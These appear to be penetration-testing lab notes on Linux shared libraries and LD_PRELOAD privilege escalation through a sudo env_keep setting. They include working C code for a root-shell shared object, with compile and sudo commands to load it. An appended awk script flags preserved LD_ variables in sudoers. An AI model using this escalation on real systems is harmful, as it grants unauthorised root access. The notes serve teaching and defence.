Shared Libraries

  • Linux programs use dynamically linked shared object libraries.
  • Static libraries - library.a
    • When a program is compiled, static libraries become part of the program and cannot be altered.
  • Dynamic libraries - library.so
    • Dynamic libraries can be modified to control the execution of the program that calls them.
  • List the shared objects/libraries required by binaries:
    • ldd /bin/ls
  • Find the version of a library:
    • ./library_name

LD_PRELOAD Privilege Escalation

sudo -l

Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
- The Defaults entry mentions LD_PRELOAD (env_keep+=LD_PRELOAD).
- Create a file as below: root.c
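#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init() runs when the dynamic loader loads this shared object. */
void _init() {
    /* Clear the variable so child processes do not preload this library again. */
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}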
- Compile the binary:
gcc -fPIC -shared -o root.so root.c -nostartfiles
- Escalate:
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
- e.g.:
gcc -fPIC -shared -o root.so root.c -nostartfiles
sudo LD_PRELOAD=/home/htb-student/root.so /usr/bin/openssl
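A defender-side check for the env_keep+=LD_PRELOAD setting shown in the sudo -l output above, as an added example that is not part of the original notes: it reads sudoers text or sudo -l output on stdin and lists the loader variables the policy preserves. The function name, the LD_ prefix rule and the sample lines are assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): list dynamic-loader variables
# that a sudo policy preserves through env_keep.
# Input on stdin: sudoers text or "sudo -l" output.
# Assumption: every LD_-prefixed name (wildcards such as LD_* included) is
# treated as risky, because ld.so reads those variables in the root process.

find_risky_env_keep() {
    awk '
    /^[ \t]*#/ { next }                       # skip sudoers comment lines
    {
        line = $0
        # Visit each env_keep= or env_keep+= assignment; env_keep-= is a removal.
        while (match(line, /env_keep[ \t]*[+]?=[ \t]*/)) {
            rest = substr(line, RSTART + RLENGTH)
            if (substr(rest, 1, 1) == "\"") {  # quoted list: "A B C"
                rest = substr(rest, 2)
                q = index(rest, "\"")
                val = (q ? substr(rest, 1, q - 1) : rest)
            } else {                           # bare single name: env_keep+=A
                val = rest
                sub(/[ \t,].*/, "", val)
            }
            m = split(val, names, /[ \t]+/)
            for (j = 1; j <= m; j++)
                if (names[j] ~ /^LD_/) print names[j]
            line = rest
        }
    }' | sort -u
}

# Constructed sample: the Defaults line from the sudo -l output above plus
# hypothetical sudoers lines (quoted list, removal, commented-out entry).
SAMPLE='    env_reset, mail_badpass, env_keep+=LD_PRELOAD
Defaults env_keep += "LANG LD_LIBRARY_PATH TZ"
Defaults env_keep -= "LD_AUDIT"
# Defaults env_keep += "LD_DEBUG"'

printf '%s\n' "$SAMPLE" | find_risky_env_keep
```

Any name it prints should be dropped from env_keep (edit the policy with visudo) unless there is a documented need for it.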